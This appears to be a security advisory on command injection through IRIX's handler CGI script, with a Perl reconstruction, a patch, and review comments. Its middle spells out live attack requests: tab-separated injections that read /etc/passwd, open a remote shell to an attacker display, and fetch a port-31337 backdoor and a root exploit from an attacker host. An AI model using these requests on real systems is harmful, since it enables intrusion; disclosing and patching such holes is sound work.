COMMAND

    /cgi-bin/handler

SYSTEMS AFFECTED

    IRIX 5.3, 6.2, 6.3, 6.4

PROBLEM

    "handler" is a small Perl CGI script that is meant to let a client
    read and download files below the web server's document root.  In
    fact it lets a remote client execute arbitrary commands on the target
    machine as the web server's user.

    Here is how it works.  "handler" reads PATH_INFO from the environment
    and appends it to a fixed "root directory" (say /var/www/htdocs).  It
    then runs a "validity check" on the result, but the check only looks
    for ".." and ignores every other character that is special to Perl or
    the shell.  The script then calls "open (INPUT, $doc)", where $doc is
    the concatenated string.  This is Perl's two-argument open, which
    parses the filename: if the string ends in a '|' character, Perl
    treats everything before it as a shell command, runs it and hands the
    script its standard output.  To exploit this "feature" through
    cgi-bin/handler:

        telnet target.machine.com 80
        GET /cgi-bin/handler/whatever;cat<TAB>/etc/passwd|<TAB>?data=Download HTTP/1.0

        (<TAB> stands for a literal tab character)

    or you may try:

        telnet target.machine.com 80
        GET /cgi-bin/handler/blah;/usr/sbin/xwsh<TAB>-display<TAB>yourhost.com|?data=Download

    Also:

        enemy% telnet victim 80
        Trying 1.2.3.4...
        Connected to victim.
        Escape character is '^]'.
        GET /cgi-bin/handler/;/usr/sbin/xwsh<TAB>-display<TAB>enemy:0<TAB>-e<TAB>/bin/csh|?data=Download
        UX:sh (sh): ERROR: Connection closed by foreign host.
        enemy%

    Evil may try this:

        enemy% whoami
        evil_cracker
        enemy% echo + + > .rhosts
        enemy% nc victim.com 80
        GET /cgi-bin/handler/;/usr/bsd/rcp<TAB>evil_cracker@enemy.com:portshell<TAB>/tmp|?data=Download
        enemy% nc victim.com 80
        GET /cgi-bin/handler/;/tmp/portshell<TAB>31337|?data=Download
        enemy% nc victim.com 31337
        % whoami
        nobody
        % rcp evil_cracker@enemy.com:irix_root_bug_of_the_week.sh \
        ./irbotw.sh ; ./irbotw.sh
        #
        [... or whatever ...]

    Note that the separator after cat (and every other whitespace gap
    inside the injected command) has to be a TAB character, not a space.
    The shell accepts a tab as a word separator, while a space would end
    the URL as far as the HTTP server is concerned and break the request
    line.  You cannot use the %xx form (%20) either, because the script
    does no decoding of its own, so you cannot pass a command that needs
    a literal space.

    Of course, you can use any other command instead of "cat", but
    remember NOT to use spaces, only tabs.

    You will see an error saying that the bogus leading path component
    (the "whatever" or "blah" above) could not be run, but the shell
    continues past the ';' and executes your command anyway.  Credit goes
    to Razvan Dragomirescu.

    This was tested on two Indy machines running IRIX 6.2 and one running
    5.3.  For IRIX 6.3 the code was changed: one line was added to the
    script,

            $doc=~s/\|*$//

    which in plain English means "remove any number of '|' characters at
    end-of-string".  But guess what: it works just as well if you put
    another TAB character after the "pipe", so that the pipe is no longer
    at end-of-string, the TAB is.  The regex then leaves the string
    alone, while Perl's two-argument open strips trailing whitespace
    before it looks for the pipe.
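
    The mechanism described above (two-argument open turning a trailing
    '|' into a command) and the IRIX 6.3 regex bypass, as an added
    example that is not part of this advisory and not the IRIX handler
    script itself.  It reconstructs the three shapes of the open call
    (5.3/6.2, 6.3, and a hardened form) in plain Perl; $ROOT, the sample
    PATH_INFO strings and all function names are assumptions.  The
    injected command is a harmless "echo" run on the local machine.

```perl
#!/usr/bin/perl
# Added example: a self-contained reconstruction of the bug class, not the
# IRIX "handler" script.  $ROOT, the sample PATH_INFO values and the
# function names are assumptions made for illustration.
use strict;
use warnings;

my $ROOT = "/var/www/htdocs";          # assumed document root

# Read whatever open() handed back, whether from a file or from a command.
sub slurp_handle {
    my ($fh) = @_;
    local $/;
    my $data = <$fh>;
    close $fh;
    return defined $data ? $data : '';
}

# IRIX 5.3/6.2 shape: ".." is the only thing rejected, then two-argument
# open.  Two-argument open parses the filename: a trailing '|' (after
# trailing whitespace is trimmed) makes it a command pipeline run via sh.
sub handler_open_5_3 {
    my ($path_info) = @_;
    my $doc = $ROOT . $path_info;
    return "rejected\n" if $doc =~ /\.\./;
    open(my $in, $doc) or return "open failed: $!\n";
    return slurp_handle($in);
}

# IRIX 6.3 shape: additionally strip '|' at end-of-string.  A TAB after the
# pipe defeats it: the regex anchors at the true end of the string, while
# open() trims trailing whitespace before it looks for the pipe.
sub handler_open_6_3 {
    my ($path_info) = @_;
    my $doc = $ROOT . $path_info;
    return "rejected\n" if $doc =~ /\.\./;
    $doc =~ s/\|*$//;
    open(my $in, $doc) or return "open failed: $!\n";
    return slurp_handle($in);
}

# Hardened: whitelist the path, forbid "." and ".." segments, and use
# three-argument open with an explicit '<' mode so the string is only ever
# a filename, never a command or an output redirection.
sub handler_open_fixed {
    my ($path_info) = @_;
    # \z (not $) so a trailing newline cannot sneak past the anchor
    return "rejected\n" unless $path_info =~ m{^(/[A-Za-z0-9._-]+)+\z};
    return "rejected\n" if $path_info =~ m{(^|/)\.\.?(/|\z)};
    my $doc = $ROOT . $path_info;
    open(my $in, '<', $doc) or return "open failed: $!\n";
    return slurp_handle($in);
}

# The leading "/;" mirrors the bogus path component in the advisory: sh
# complains about it on stderr and carries on with the echo after the ';'.
my $inject     = "/;echo\tinjected|";
my $inject_tab = "/;echo\tinjected|\t";      # trailing TAB defeats s/\|*$//

for my $case (
    [ "5.3/6.2, plain pipe",   \&handler_open_5_3,   $inject      ],
    [ "6.3, plain pipe",       \&handler_open_6_3,   $inject      ],
    [ "6.3, pipe + TAB",       \&handler_open_6_3,   $inject_tab  ],
    [ "fixed, pipe + TAB",     \&handler_open_fixed, $inject_tab  ],
    [ "fixed, honest path",    \&handler_open_fixed, "/index.html" ],
) {
    my ($label, $fn, $path) = @$case;
    print "$label: ", $fn->($path);
}
```

    Run it as "perl handler_demo.pl".  The first and third cases print
    "injected" (with a shell complaint about /var/www/htdocs/ on stderr);
    the second fails to open a file whose name ends in "echo<TAB>injected",
    which is all the 6.3 regex buys you; the hardened function rejects the
    pipe string before open is ever reached, and on a host with a real
    document root the last case returns the file.  The three-argument
    open matters as much as the whitelist: with an explicit '<' mode Perl
    never parses the filename for pipes or redirections, so even a
    character the whitelist forgot cannot turn a read into a command.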

SOLUTION

    Nuke that handler; you most likely don't need it.  For those who want
    to patch it instead, a fix by Wolfram Schneider follows.  Apply it to
    "wrap" as well, which has the same problem:

    *** handler.orig        Wed Jul 23 20:49:26 1997
    --- handler     Wed Jul 23 20:55:25 1997
    ***************
    *** 26,31 ****
    --- 26,32 ----
      $pathRoot = $_[$#_] ;
      $doc      = $ROOT.$PATH ;

    + $_ = $PATH;
      &ErrBadPath unless &ValidPath ; # Check for server spoofing

      #__________________________________________________________
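    Review bot: the added `+ $_ = $PATH;` makes ValidPath test the client-supplied PATH_INFO through the global `$_`, which is fragile: any later code that touches `$_` (a `for` or `while` loop, a `map`) silently changes what gets validated. Pass the value explicitly instead, e.g. `&ErrBadPath unless &ValidPath($PATH);` with `local $_ = shift;` as the first line of ValidPath, so the string that is checked cannot drift away from the one that ends up in `$doc`. Checking $PATH rather than $doc is fine here because $ROOT is the script's own constant, but that assumption deserves a comment next to the `$doc = $ROOT.$PATH ;` line.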
    ***************
    *** 108,113 ****
    --- 109,117 ----

      sub ValidPath
      {
    + # suggested by drazvan@kappa.ro
    +     if (/[|;]/)       { return '' };
    +
          return 1 unless /\.\./ ;

          return '' if /^\.\./ ;
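    Review bot: `if (/[|;]/) { return '' };` is a blacklist of the two characters the advisory uses, not a definition of what a path may contain. It does stop the 6.3 trailing-TAB bypass, since the `|` is rejected wherever it sits, but two-argument open still parses the filename, and a blacklist has to be re-argued for every character Perl or the shell treats specially. Prefer a whitelist ahead of the `..` test, e.g. `return '' unless m{^(/[\w.-]+)+\z};`, and change the script's `open (INPUT, $doc)` call to the three-argument form `open(INPUT, '<', $doc)` so the string is never interpreted as a command or redirection. The stray `;` after the closing brace is harmless but unidiomatic.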
    ***************
    *** 117,120 ****
    --- 121,136 ----
          return 1 ;
      }

    + sub ErrBadPath
    + {
    +       print <<ENDOFTEXT ;
    + Content-type: text/html

    + <HEAD><TITLE>404 Not Found</TITLE></HEAD>
    + <BODY><H1>404 Not Found</H1>
    + The requested URL $PATH was not found on this server.<P>
    + </BODY>
    + ENDOFTEXT
    +
    +       die ;
    + }
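    Review bot: ErrBadPath interpolates the client-controlled $PATH into an HTML body with no escaping (`The requested URL $PATH was not found on this server.<P>`), so the error page reflects whatever markup PATH_INFO carried; HTML-escape it (at least `&`, `<`, `>`) or leave it out of the message. The response also carries no `Status:` header, so the server will send a 200 with a page that says 404; add `Status: 404 Not Found` before the `Content-type:` line. The blank line after `Content-type: text/html` must stay, it is the header/body separator. Finally, `die ;` after printing sends a death message to the server's error log and exits non-zero, which works for a CGI but `exit 1 ;` states the intent more plainly.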